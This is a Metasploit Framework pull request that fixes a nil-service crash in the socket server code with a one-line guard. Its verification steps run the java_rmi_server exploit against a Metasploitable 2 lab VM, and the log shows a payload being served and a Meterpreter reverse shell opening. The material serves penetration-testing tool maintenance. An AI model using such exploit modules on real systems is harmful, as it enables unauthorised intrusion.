### PR TITLE
Fix java rmi service undefined method wait

### DIFF
--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -44,7 +44,7 @@ module Exploit::Remote::SocketServer
     primer
 
     # Wait on the service to stop
-    self.service.wait
+    self.service.wait if service
   end
 
   #


### PR DESCRIPTION
Fixes a crash introduced by https://github.com/rapid7/metasploit-framework/commit/1494f804e74ebec0aba8db3dcd30736acdeea204

Closes https://github.com/rapid7/metasploit-framework/issues/16383

## Verification

- Download metasploitable 2 - https://information.rapid7.com/download-metasploitable-2017-thanks.html and run it in a vm
- Run the module against the target:
```
use exploit/multi/misc/java_rmi_server
run metasploitable2_ip
```

Verify there is no longer an error:
```
[*] Started reverse TCP handler on 10.0.10.115:4444 
[*] 10.0.10.42:1099 - Using URL: http://0.0.0.0:8080/TUNYQOcmFuvxt
[*] 10.0.10.42:1099 - Local IP: http://10.0.10.115:8080/TUNYQOcmFuvxt
[*] 10.0.10.42:1099 - Server started.
[*] 10.0.10.42:1099 - Sending RMI Header...
[*] 10.0.10.42:1099 - Sending RMI Call...
[*] 10.0.10.42:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 10.0.10.42
[*] Meterpreter session 1 opened (10.0.10.115:4444 -> 10.0.10.42:41859 ) at 2022-03-25 20:43:56 +0100
[-] 10.0.10.42:1099 - Exploit failed: NoMethodError undefined method `wait' for nil:NilClass <----
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) > 

```